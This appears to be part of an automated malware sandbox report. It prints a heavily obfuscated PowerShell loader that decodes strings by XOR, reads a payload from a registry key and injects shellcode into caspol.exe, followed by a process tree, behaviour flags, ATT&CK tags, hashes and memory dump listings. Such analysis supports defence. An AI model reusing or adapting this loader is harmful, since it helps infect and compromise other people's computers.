aBAk0KaAIn6MiFLu7SkEUnAChESgFChEhr3SnEapBkr8Kr4Co8Ro7Gr9Tr7ThEFe3Fi8Fj3FoEovBPh9va8Ec8obAstANiDBeBAr7Pa9Ma3DoBMu7AnBTo1St9ReEKoEGiFPaEsk3Un9Zi8fi9Ma6Lu8BaABoAVbDOlBBl7ArFVa0KuFKv1Fa9GrEPhEReFGnEGr3Ra9Un8Mi9fo6Sc8TeANaAQuDkoBCu7PrFSn0ReFUd1In9FoEpeEElFBrEId3Al9di8Po9Af6La8LuAMoAOlDAfBGa7EfFSi0KoFSe1ca9EkEBoEVaAPjEwa3XoENoBTo9Ly8Ov8BrAsoABuDPaBVa7Un9na3AbBAn7SrBNe1Nu9UnEGaEBeADiECrABaEGrABe'Li;la&sp(Sc`$CySFotPrrSuaWofNyfFdaVasTitGesMotCatMaeOplBusEneKo7Op)Th Ny`$KeMtiakvcPehNoiSvcMaoRolBoaFatSeeSydFa6Om;Fo`$MocFdiLicMaaAdlPraGosno Pa=Fe WefankSlpAr Hj`$OvSNotByrBaaPlfAgfBoaStsDetHysnotSotJaeEllMesbiePi5Ud Aj`$UgSditTarCaahefMifAnaTisMrtOvsCrtBetDeeNolSnstheKo6Po;Sa`$crMBlaDicThhSniLicReoFilPnaPrtHbeCadsm7No Bl=To AlHCeTtoBSh tr'SeEFo7Tr8Fo7BrABu2SoBDr7inACa2RaAdiCReBFr5ReABe6MoBBo1CaAHo5HoBFr1InBCr0TeAFlFTrAFl6TrBUn1lyFBr0GeENi3AnFMiEPaESt3OvERk7Ec8skBElAEu2MaALeFAsAGrFAsATeCStAfe6UnAPa7FlEAsDFo8AnAFiAUnDOpBHa5SaASuCLoAcy8PrALy6UnEReBst9Fe8su8BiAInATuDDiBve7Gl9Ha3MeBBi7StBIn1Ma9AnECuFSo9TiFbo9Ra9De9AfAFl6HeBCh1UaANyCFuEAgFbeEAs3LiFRe0FeFVi6JeFerBAuEStFFoENo3idFBl3LsBPrBExFPi0upFKa3RoFDo3GoFLa3RnEUnFTrEFi3AcFTh3EmBOpBMiFOv7MrFSt3NeEPhASa'Gd;Be&La(Ra`$CoSCatCirMeaMufUnfReaArsKltensEqtTitUpeSilResirein7Af)Sa Sp`$OvMStaVecPahBeiCacDeoSulTaaButGaeRedMo7Bl;Fe`$KoMNoaDucBlhUdiLacPloKllTrakatKoePldPo8Ti Ha=Tr CiHBrTBoBBy Sn'GeEAe7ti8TjDUnAAl6frAPa4BaBHe1LaAInAUnBor7SkASkASeAPe0MuEIn3LoFTrERiEDa3CaEAy7Ar8GrBEmAla2BoADeFSeAStFPrAVaCEmAsp6ruAde7PrEKnDHy8BuAInAJaDBeBRe5spAAlCFiAJa8EnAAf6PaEdeBBr9Ap8Ma8MuAPoAUfDTiBSl7Ut9Da3ReBAl7ClBan1Sk9brEStFCr9BrFEx9Au9mo9EnADe6CrBOr1PoAOrCnoEFaFFaERe3HaFKy3ErBTuBAfFan2UnFMa3InFHy3TiFBa3BoFPe3JdFTo3GlEFlFOrEBi3NuFMa3VaBcoBSnFFi0GuFNo3NiFFa3SeFKr3AgESyFSeEUn3CeFTa3AaBCrBEnFBa7SuENoASu'Al;Ca&Ls(Ce`$BrSWatKdrOuaRefUnfSkaPosSptnesAmtSptFaeSelBesSueEc7Ar)Hi Ca`$FoMUdaFocCohCaiAlcudoCylseaAftGeeNadDy8Ch;an`$alMByumumtplPreAfdSneFe=Sk(PrGAneVatHu-ReIMitLeeDemViPElrBooSppSieOgrHotRayFa ny-enPdrafitRohKv Ex'BeHReKFoCAcUFr:En\PaQTiuSkaManNatBeiUncImofo\FeSNeaPluTilFogTreSa'Sk)Bo.CaNBreFodTirNoyDekStnFliTinHugKv;Ru`$AvMKraUncBrhEmiVocSloRulVaaHytIneundCo9Va Ly=Fu GnHdiTKiBCa No'PrESk7Un8PoEErARe2TiASm0PoAKoBMeACoAUnASa0NoAUnCCeACyFMeASh2VeBpo7AdACh6poApo7PlENo3LeFDaEIsESa3Sp9Wh8In9Ov0deBFoABeBSe0HuBTr7GlAPo6ItAmeECeEInDTu8Ti0riADyCHeAFoDMaBKn5kaAUn6FoBVi1NoBOu7Pr9TrEwaFBl9hoFIn9In8Hy5poBHu1FiATaCRoAAcEOp8El1FaATe2SkBAr0TrAbl6FoFCo5AlFpr7Ca9Co0SaBIn7BrBsy1RaAPaADoAunDInAPi4TiEFoBStEBr7Po8meEMoBfo6FeAAjEWaAEyFPhAAd6TuATa7VeAZi6TiEReAGa'Do;st&Ti(Bi`$FeSDatRarAbaGrfMafLoaOusAatFrsUntRetUneArlTusUdeAf7De)Br Fe`$SlMAgaCocPrhSuihicIdoNolAramitMeeEndNe9Ba;De`$GlMHiuHymHelDaeDadStePu0Am Ch=Mu KiHEmTSnBTa Ri'So9Tr8Pu9Uo0inBHeABiBMy0AuBSe7BiAAn6InAImEReEEtDHe9Fo1inBls6TaATaDHoBLu7AnADrACrACuEWiAUd6WiETrDIr8KuASvAGaDTeBVi7ChAFo6GaBTi1SaAreCNoBPa3Mo9Te0DaAAg6geBTv1wyBFi5CaAOpANeAGa0AfAFo6SkBLi0TeEvaDcy8AnEFiADi2LaBPr1LeBFe0FrASyBBeASt2coAIdFta9ReEChFBo9MaFSc9Pr8Sl0ElANoCSkBgr3SvBGrASuESaBUnENs7He8PoEVvAIm2DrAUd0DeANoBStAChAToAFo0StAFlCneAOvFFoAWh2KrBLe7LgAEy6LuAFr7PrESeFAmECi3ToFdi3SiERoFSoEtr3ToERr3TeEPh7Hy8kr7InASt2KvBHy7EmAIn2GeAImCSuBFu5BlAGi6KiBDi1HeAun5CaBZe1UtBap0GoAJoFHiARe6WiBAr1SmFPe0BrEYmFovECo3raFvr0PhFUn6ouFStBtrEHaASy'Re;co&Re(Ch`$BaSKotAnrMaaTefVafFraStsFitAasPrtFotCaeFolUdsRaeBa7Bl)Sk Bz`$GuMNyuFemAslKveMidEkeIn0Ch;te`$TeSJvmEkaSilMolAwmPboanuPrtRehnueCodSy=el`$TrMStaStcJahHriuncCyoBelTeakrtDdeMadmr.PrcInobluSpnAgtpa-Ne3Ne5Un8pu;Or`$EnMCuuDrmInlAfeEndKaeAt1In Sh=Er ElHAnTspBSa Ac'se9Gr8Ja9No0AcBBiAPeBDr0SkBFl7PrASh6BaAfaERaEdeDGr9Ve1DoBUn6BuAWeDStBUn7StAFjALeAChEbaAAu6ReEOtDOc8DrABeAEmDFaBAp7ViAGa6TiBDe1KeAUnCgeBOm3Ly9Ud0ReAPr6maBSo1BeBVi5KkACuABiAEu0CeARe6PuBun0IrELeDTi8VeEUnARn2CuBIl1DeBFo0StASuBunAYa2AlAArFel9DeEOrFUb9StFHu9Ge8Ly0BuAFoCexBUe3CoBGrAFrEAaBBiERe7Gn8EsEAuAPu2MaASt0StADuBSkAfoATeATo0PrAScCEsAHuFplABy2SuBDd7VeACy6MaAMo7HiENeFStEKr3akFPi0ArFKa6MoFUdBLiEHeFDiEbi3BoEIn7Ti8FoDpiApr6WuANg4SpBBy1opAInALeBBa7NrAAbAstABa0ArEunFLgEOv3StEQu7Af9Fa0KrACoEDyAor2InASyFWoAFoFBeAOrESpATeCMaBri6anBTr7HuAVaBcrAGa6SiASu7NoESpAOp'So;Dd&Ud(Al`$AuSFotDirSyarefRefFaaPrsMatNasSltSctHoeJulSisLyere7We)Ne Si`$FrMCouSumDeloxeSudCyeLa1Va;be`$TeMTiuExmHilBoeFadAseSk2en Ve=Le UnHQuTPrBAn Is'DeESy7cu9Wr3SuANoCFlBDh0PhBPr7TrBAr3BeBNo1TrAVoCMaBKa3SeAFuBPeAPu6ChBBl0TuBKaAUnEDe3vaFFjEHaERe3Br9Fo8Ho9Ex0SpBAdADiBSt0MiBDe7TiASk6enADoERaEStDAf9Qu1DeBLi6HvAAtDLaBFo7MeACoAToABlEStASy6PhEFiDUn8HnAHoAPlDGoBVi7GeAme6GrBNo1BeAWiCViBMu3pa9Go0TrAJa6SiBFu1PeBSi5CoAksAIsATe0BrAAr6VoBDe0PeEDeDHy8QuEBrASq2PrBAn1KaBCa0veABaBSaAKe2SpALiFde9KoEYnFEn9FoFNe9Ne8Su4AsANy6AnBDe7In8Re7UdAEf6BeAGuFfoAbo6FrAEi4ScAOp2KiBCh7MoAUd6Gi8Fo5UdAmeCKoBUl1op8Re5SeBCh6BiAHaDTvAPa0FoBUo7VaAPrABeAafCNoAKoDAu9Pl3SeAUnCSaAGiAObACoDThBGe7DrAVe6AfBTi1inEBlBSaEFo7Un8gr7blATa2MiBDd7DeADi2HaAPaCStBSl5CrAAr6AcBEn1BlAOm5PrBPr1MeBNe0PtAJaFThAal6DeBPa1ObFEr0PaEIcFWeEDe3SkECoBMo8Un4Po8Kr7Ge9Br7MyEBo3Ch8Ca3TiEBaBIn9Ec8Bu8HyALuALaDRaBVa7Sy9Rh3shBAs7BeBGe1un9TaETiEHjFWe9De8Au8DoAslAMyDDoBJo7Le9ra3OcBSt7BrBSk1Ub9MoETrEPaAUlETy3PaEMiBTr9No8Wr9Jo5UnAJaCRiABrAgrAHe7Ch9ExEToEPuAOvEOpATrESuADi'Ka;At&Ki(Ek`$KlSektStrSaaBafPafBraDasTetSlsSktMetheeOrlFesOreSt7Si)Lo Af`$ClMBruTemAvlHeeVidSueIn2Sp;Ur`$HyMFruFomSllCleDidHeeSl3Br Ap=Po DiHPaTUnBAn Cr'FrEFr7Pa9fo3UrAHeCSkBSp0DeBSl7DiBFr3ElBAu1RaAAnCStBIn3ReAMoBUnABe6PrBBr0BaBKuAHeECaDSt8RuAOmAmoDObBKo5SkApeCJiAAn8MiAAt6LkEPlBUnEHj7Ps8ViDFiACi6LiASk4SoBsu1GeAPrACaBBa7KoAFoARoASp0baEDdFNaELo7ElAFl0UnACaAAnADi0CoABl2ReAAfFBrAsc2EnBAd0AfESeATu'Af;ya&Ty(Su`$BaSMntUmrKaaThfPifSnaTrsTatStsMutLatkaeurlUnsBoeJo7Be)Bl Sp`$SpMUnuFrmstlAbeSadSyeOb3Bi#Sl;""";Function Mumlede9 { param([String]$Skrminddelingers); For($Bleblomst121=2; $Bleblomst121 -lt $Skrminddelingers.Length-1; $Bleblomst121+=(2+1)){ $Muddergrfters = $Muddergrfters + $Skrminddelingers.Substring($Bleblomst121, 1); } $Muddergrfters;}$Erotiseringer2460 = Mumlede9 'AvIWaEAvXBa ';$Erotiseringer2461= Mumlede9 $redans;if([IntPtr]::size -eq 8){start-job { param($Stteskippernes) powershell $Stteskippernes } -RunAs32 -Argument $Erotiseringer2461 | wait-job | Receive-Job;}else{&$Erotiseringer2460 $Erotiseringer2461;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2844
- - \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Skrminddelingers); $Stteskipperneschenia24 = New-Object byte[] ($Skrminddelingers.Length / 2); For($Bleblomst121=0; $Bleblomst121 -lt $Skrminddelingers.Length; $Bleblomst121+=2){ $Stteskipperneschenia24[$Bleblomst121/2] = [convert]::ToByte($Skrminddelingers.Substring($Bleblomst121, 2), 16); $Stteskipperneschenia24[$Bleblomst121/2] = ($Stteskipperneschenia24[$Bleblomst121/2] -bxor 195); } [String][System.Text.Encoding]::ASCII.GetString($Stteskipperneschenia24);}$Aftenkjolers0=HTB '90BAB0B7A6AEEDA7AFAF';$Aftenkjolers1=HTB '8EAAA0B1ACB0ACA5B7ED94AAADF0F1ED96ADB0A2A5A68DA2B7AAB5A68EA6B7ABACA7B0';$Aftenkjolers2=HTB '84A6B793B1ACA082A7A7B1A6B0B0';$Aftenkjolers3=HTB '90BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8BA2ADA7AFA691A6A5';$Aftenkjolers4=HTB 'B0B7B1AAADA4';$Aftenkjolers5=HTB '84A6B78EACA7B6AFA68BA2ADA7AFA6';$Aftenkjolers6=HTB '919790B3A6A0AAA2AF8DA2AEA6EFE38BAAA7A681BA90AAA4EFE393B6A1AFAAA0';$Aftenkjolers7=HTB '91B6ADB7AAAEA6EFE38EA2ADA2A4A6A7';$Aftenkjolers8=HTB '91A6A5AFA6A0B7A6A787A6AFA6A4A2B7A6';$Aftenkjolers9=HTB '8AAD8EA6AEACB1BA8EACA7B6AFA6';$Straffaststtelse0=HTB '8EBA87A6AFA6A4A2B7A697BAB3A6';$Straffaststtelse1=HTB '80AFA2B0B0EFE393B6A1AFAAA0EFE390A6A2AFA6A7EFE382ADB0AA80AFA2B0B0EFE382B6B7AC80AFA2B0B0';$Straffaststtelse2=HTB '8AADB5ACA8A6';$Straffaststtelse3=HTB '93B6A1AFAAA0EFE38BAAA7A681BA90AAA4EFE38DA6B490AFACB7EFE395AAB1B7B6A2AF';$Straffaststtelse4=HTB '95AAB1B7B6A2AF82AFAFACA0';$Straffaststtelse5=HTB 'ADB7A7AFAF';$Straffaststtelse6=HTB '8DB793B1ACB7A6A0B795AAB1B7B6A2AF8EA6AEACB1BA';$Straffaststtelse7=HTB '8A869B';$Straffaststtelse8=HTB '9F';function fkp {Param ($Flagelliform, $Tilmaalende) ;$Machicolated0 =HTB 'E78EA2A2A7A6B1B0E3FEE3EB9882B3B387ACAEA2AAAD9EF9F980B6B1B1A6ADB787ACAEA2AAADED84A6B782B0B0A6AEA1AFAAA6B0EBEAE3BFE394ABA6B1A6EE8CA1A9A6A0B7E3B8E3E79CED84AFACA1A2AF82B0B0A6AEA1AFBA80A2A0ABA6E3EE82ADA7E3E79CED8FACA0A2B7AAACADED90B3AFAAB7EBE790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6FBEA98EEF29EED86B2B6A2AFB0EBE782A5B7A6ADA8A9ACAFA6B1B0F3EAE3BEEAED84A6B797BAB3A6EBE782A5B7A6ADA8A9ACAFA6B1B0F2EA';&($Straffaststtelse7) $Machicolated0;$Machicolated5 = HTB 'E78CAEA8ACB0B7ADAAADA4B0ABA6ADB0BAADA6B7B0E3FEE3E78EA2A2A7A6B1B0ED84A6B78EA6B7ABACA7EBE782A5B7A6ADA8A9ACAFA6B1B0F1EFE39897BAB3A6989E9EE383EBE782A5B7A6ADA8A9ACAFA6B1B0F0EFE3E782A5B7A6ADA8A9ACAFA6B1B0F7EAEA';&($Straffaststtelse7) $Machicolated5;$Machicolated1 = HTB 'B1A6B7B6B1ADE3E78CAEA8ACB0B7ADAAADA4B0ABA6ADB0BAADA6B7B0ED8AADB5ACA8A6EBE7ADB6AFAFEFE383EB9890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8BA2ADA7AFA691A6A59EEB8DA6B4EE8CA1A9A6A0B7E390BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8BA2ADA7AFA691A6A5EBEB8DA6B4EE8CA1A9A6A0B7E38AADB793B7B1EAEFE3EBE78EA2A2A7A6B1B0ED84A6B78EA6B7ABACA7EBE782A5B7A6ADA8A9ACAFA6B1B0F6EAEAED8AADB5ACA8A6EBE7ADB6AFAFEFE383EBE785AFA2A4A6AFAFAAA5ACB1AEEAEAEAEAEFE3E797AAAFAEA2A2AFA6ADA7A6EAEA';&($Straffaststtelse7) $Machicolated1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Overpinching,[Parameter(Position = 1)] [Type] $Evolves = [Void]);$Machicolated2 = HTB 'E78EA2B2B6A6B7B7A6E3FEE39882B3B387ACAEA2AAAD9EF9F980B6B1B1A6ADB787ACAEA2AAADED87A6A5AAADA687BAADA2AEAAA082B0B0A6AEA1AFBAEBEB8DA6B4EE8CA1A9A6A0B7E390BAB0B7A6AEED91A6A5AFA6A0B7AAACADED82B0B0A6AEA1AFBA8DA2AEA6EBE782A5B7A6ADA8A9ACAFA6B1B0FBEAEAEFE39890BAB0B7A6AEED91A6A5AFA6A0B7AAACADED86AEAAB7ED82B0B0A6AEA1AFBA81B6AAAFA7A6B182A0A0A6B0B09EF9F991B6ADEAED87A6A5AAADA687BAADA2AEAAA08EACA7B6AFA6EBE782A5B7A6ADA8A9ACAFA6B1B0FAEFE3E7A5A2AFB0A6EAED87A6A5AAADA697BAB3A6EBE790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F3EFE3E790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F2EFE39890BAB0B7A6AEED8EB6AFB7AAA0A2B0B787A6AFA6A4A2B7A69EEA';&($Straffaststtelse7) $Machicolated2;$Machicolated3 = HTB 'E78EA2B2B6A6B7B7A6ED87A6A5AAADA680ACADB0B7B1B6A0B7ACB1EBE782A5B7A6ADA8A9ACAFA6B1B0F5EFE39890BAB0B7A6AEED91A6A5AFA6A0B7AAACADED80A2AFAFAAADA480ACADB5A6ADB7AAACADB09EF9F990B7A2ADA7A2B1A7EFE3E78CB5A6B1B3AAADA0ABAAADA4EAED90A6B78AAEB3AFA6AEA6ADB7A2B7AAACAD85AFA2A4B0EBE782A5B7A6ADA8A9ACAFA6B1B0F4EA';&($Straffaststtelse7) $Machicolated3;$Machicolated4 = HTB 'E78EA2B2B6A6B7B7A6ED87A6A5AAADA68EA6B7ABACA7EBE790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F1EFE3E790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F0EFE3E786B5ACAFB5A6B0EFE3E78CB5A6B1B3AAADA0ABAAADA4EAED90A6B78AAEB3AFA6AEA6ADB7A2B7AAACAD85AFA2A4B0EBE782A5B7A6ADA8A9ACAFA6B1B0F4EA';&($Straffaststtelse7) $Machicolated4;$Machicolated5 = HTB 'B1A6B7B6B1ADE3E78EA2B2B6A6B7B7A6ED80B1A6A2B7A697BAB3A6EBEA';&($Straffaststtelse7) $Machicolated5 ;}$Gastrocoloptosis = HTB 'A8A6B1ADA6AFF0F1';$Machicolated6 = HTB 'E78BA2AFAFACA6A7E3FEE39890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8EA2B1B0ABA2AF9EF9F984A6B787A6AFA6A4A2B7A685ACB185B6ADA0B7AAACAD93ACAAADB7A6B1EBEBA5A8B3E3E784A2B0B7B1ACA0ACAFACB3B7ACB0AAB0E3E790B7B1A2A5A5A2B0B7B0B7B7A6AFB0A6F7EAEFE3EB848797E383EB988AADB793B7B19EEFE398968AADB7F0F19EEFE398968AADB7F0F19EEFE398968AADB7F0F19EEAE3EB988AADB793B7B19EEAEAEA';&($Straffaststtelse7) $Machicolated6;$cicalas = fkp $Straffaststtelse5 $Straffaststtelse6;$Machicolated7 = HTB 'E787A2B7A2ACB5A6B1A5B1B0AFA6B1F0E3FEE3E78BA2AFAFACA6A7ED8AADB5ACA8A6EB988AADB793B7B19EF9F999A6B1ACEFE3F0F6FBEFE3F3BBF0F3F3F3EFE3F3BBF7F3EA';&($Straffaststtelse7) $Machicolated7;$Machicolated8 = HTB 'E78DA6A4B1AAB7AAA0E3FEE3E78BA2AFAFACA6A7ED8AADB5ACA8A6EB988AADB793B7B19EF9F999A6B1ACEFE3F3BBF2F3F3F3F3F3EFE3F3BBF0F3F3F3EFE3F3BBF7EA';&($Straffaststtelse7) $Machicolated8;$Mumlede=(Get-ItemProperty -Path 'HKCU:\Quantico\Saulge').Nedrykning;$Machicolated9 = HTB 'E78EA2A0ABAAA0ACAFA2B7A6A7E3FEE39890BAB0B7A6AEED80ACADB5A6B1B79EF9F985B1ACAE81A2B0A6F5F790B7B1AAADA4EBE78EB6AEAFA6A7A6EA';&($Straffaststtelse7) $Machicolated9;$Mumlede0 = HTB '9890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8EA2B1B0ABA2AF9EF9F980ACB3BAEBE78EA2A0ABAAA0ACAFA2B7A6A7EFE3F3EFE3E3E787A2B7A2ACB5A6B1A5B1B0AFA6B1F0EFE3F0F6FBEA';&($Straffaststtelse7) $Mumlede0;$Smallmouthed=$Machicolated.count-358;$Mumlede1 = HTB '9890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8EA2B1B0ABA2AF9EF9F980ACB3BAEBE78EA2A0ABAAA0ACAFA2B7A6A7EFE3F0F6FBEFE3E78DA6A4B1AAB7AAA0EFE3E790AEA2AFAFAEACB6B7ABA6A7EA';&($Straffaststtelse7) $Mumlede1;$Mumlede2 = HTB 'E793ACB0B7B3B1ACB3ABA6B0BAE3FEE39890BAB0B7A6AEED91B6ADB7AAAEA6ED8AADB7A6B1ACB390A6B1B5AAA0A6B0ED8EA2B1B0ABA2AF9EF9F984A6B787A6AFA6A4A2B7A685ACB185B6ADA0B7AAACAD93ACAAADB7A6B1EBE787A2B7A2ACB5A6B1A5B1B0AFA6B1F0EFE3EB848797E383EB988AADB793B7B19EEF988AADB793B7B19EEAE3EB9895ACAAA79EEAEAEA';&($Straffaststtelse7) $Mumlede2;$Mumlede3 = HTB 'E793ACB0B7B3B1ACB3ABA6B0BAED8AADB5ACA8A6EBE78DA6A4B1AAB7AAA0EFE7A0AAA0A2AFA2B0EA';&($Straffaststtelse7) $Mumlede3#"
      4⤵
      Checks QEMU agent file
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:240
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
        5⤵
        Checks QEMU agent file
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3824

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
8c30c2596083c596bf325d0bb8462286

SHA1
10f17d92f60c2e227c2dd201cf30aacb931dae7a

SHA256
b6cb15019ffdd4368e902ebd06af956946731881d45dba5adb4473ade3b51ee1

SHA512
5b1e4712e9933eb43e6617ce4cf0d47f1b7503044c99930138c0b087f01a8855b6af74604abc3e50388c1465b71de7c7aa254a64c92e462626fba42062b6fdbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
3d31e4270e6523a20c85e7e23dfcfd11

SHA1
4d74a93fb0b9a74bf981367429dbc04839994341

SHA256
ffccc85c0f9c4e5729cb186daaa6cb785ccd3a4ea73c0fe781820f724d8f8c9e

SHA512
eceeacbbd3661df753d3d6803259109f4eb5083c055efd44bbc1bdbf4e2660ee35d23877a343a95ed7902320bfe63d6986bf11807a182cf6d1b4a44e33f27237

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
3d31e4270e6523a20c85e7e23dfcfd11

SHA1
4d74a93fb0b9a74bf981367429dbc04839994341

SHA256
ffccc85c0f9c4e5729cb186daaa6cb785ccd3a4ea73c0fe781820f724d8f8c9e

SHA512
eceeacbbd3661df753d3d6803259109f4eb5083c055efd44bbc1bdbf4e2660ee35d23877a343a95ed7902320bfe63d6986bf11807a182cf6d1b4a44e33f27237

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
690650d35e2942cbf57b70f1ada694f9

SHA1
538537f02b3a042f6b318ecda8d278afb62638d4

SHA256
2e6e4ba9fd90b8b5aeb5ccd0116e099f394a0a354668a05f472a45843a140e54

SHA512
fbb556bacb6596b623293110ba0dcd3d0827f3bd91e89dcc8b65e763039946cb5e25a28d25754d17fc9d20e989e9e9047440f1e5484b732bb3027f8a053d0d89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
d0925d1bc387637915561ae1f909166f

SHA1
89ae3cd18baeb1c35bfd72d8d1c758a5e940bf48

SHA256
532ef26f3859d15ff7b24315587bfd0f2f9cf1977ed18c050183394caffd11d8

SHA512
aa396aeb8cc167471cea075a22cd43d2f8e1702a640507b6c327519a582cb2ba7d3db04facf6dc140ed131025718ec1579cf8a311d1f45fc7b67f1cdca03b99e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
0a5bb7d336de27e58aae6b5347e88d17

SHA1
26216edfa28265a5c9190cdf930aa040bfdf84ee

SHA256
227c492584dfe3bddf63477e40a0317d9cca8a56263a1f3dd129046f2b48c1f2

SHA512
df2621cd05d0acb5d30afa87b9e63a81e56706cf9c5440dd889bda042f58d8a9d944fed08bd8174f3ef204d8272c327cf7fa6f44e1519c5ca9b0628463a7fa53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
7713f2d5a67edb696ea4d9179042cd58

SHA1
0949f7bb3192e704b15c38149a8fa8030a7b3a9c

SHA256
9461c2111dcfea82c381ce49e31c8ddd566a42080e3c298d6e8b4fbb83ccea5d

SHA512
a9a7b3db7b43b9d45ffb82fc4a9462ee70fe5afa93208b0e2dc9c05ca1980f7cad03e1af2cb29b0b924b6fd5da80d6430587fb00a3675934e84e860788c1cf32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
7713f2d5a67edb696ea4d9179042cd58

SHA1
0949f7bb3192e704b15c38149a8fa8030a7b3a9c

SHA256
9461c2111dcfea82c381ce49e31c8ddd566a42080e3c298d6e8b4fbb83ccea5d

SHA512
a9a7b3db7b43b9d45ffb82fc4a9462ee70fe5afa93208b0e2dc9c05ca1980f7cad03e1af2cb29b0b924b6fd5da80d6430587fb00a3675934e84e860788c1cf32

Download Submit
memory/240-162-0x0000000077080000-0x0000000077223000-memory.dmp

Filesize
1.6MB

Download
memory/240-153-0x00000000079A0000-0x0000000007AA0000-memory.dmp

Filesize
1024KB

Download
memory/240-166-0x0000000077080000-0x0000000077223000-memory.dmp

Filesize
1.6MB

Download
memory/240-159-0x0000000077080000-0x0000000077223000-memory.dmp

Filesize
1.6MB

Download
memory/240-165-0x0000000077080000-0x0000000077223000-memory.dmp

Filesize
1.6MB

Download
memory/240-158-0x00007FF8E9F10000-0x00007FF8EA105000-memory.dmp

Filesize
2.0MB

Download
memory/240-149-0x0000000007B50000-0x0000000007BE6000-memory.dmp

Filesize
600KB

Download
memory/240-150-0x0000000007AE0000-0x0000000007B02000-memory.dmp

Filesize
136KB

Download
memory/240-151-0x0000000008D60000-0x0000000009304000-memory.dmp

Filesize
5.6MB

Download
memory/240-152-0x00000000079A0000-0x0000000007AA0000-memory.dmp

Filesize
1024KB

Download
memory/2844-138-0x00007FF8CBCA0000-0x00007FF8CC761000-memory.dmp

Filesize
10.8MB

Download
memory/2844-137-0x000001E7A2E40000-0x000001E7A304A000-memory.dmp

Filesize
2.0MB

Download
memory/2844-136-0x000001E7A2AB0000-0x000001E7A2C26000-memory.dmp

Filesize
1.5MB

Download
memory/2844-135-0x00007FF8CBCA0000-0x00007FF8CC761000-memory.dmp

Filesize
10.8MB

Download
memory/2844-134-0x000001E79FD30000-0x000001E79FD52000-memory.dmp

Filesize
136KB

Download
memory/3824-163-0x0000000000BC0000-0x0000000000CC0000-memory.dmp

Filesize
1024KB

Download
memory/3824-169-0x00007FF8E9F10000-0x00007FF8EA105000-memory.dmp

Filesize
2.0MB

Download
memory/3824-170-0x0000000077080000-0x0000000077223000-memory.dmp

Filesize
1.6MB

Download
memory/4828-148-0x0000000006950000-0x000000000696A000-memory.dmp

Filesize
104KB

Download
memory/4828-147-0x00000000073D0000-0x0000000007A4A000-memory.dmp

Filesize
6.5MB

Download
memory/4828-145-0x0000000006280000-0x000000000629E000-memory.dmp

Filesize
120KB

Download
memory/4828-144-0x0000000005CB0000-0x0000000005D16000-memory.dmp

Filesize
408KB

Download
memory/4828-143-0x00000000054D0000-0x0000000005536000-memory.dmp

Filesize
408KB

Download
memory/4828-142-0x0000000005430000-0x0000000005452000-memory.dmp

Filesize
136KB

Download
memory/4828-141-0x0000000005610000-0x0000000005C38000-memory.dmp

Filesize
6.2MB

Download
memory/4828-140-0x00000000029E0000-0x0000000002A16000-memory.dmp

Filesize
216KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads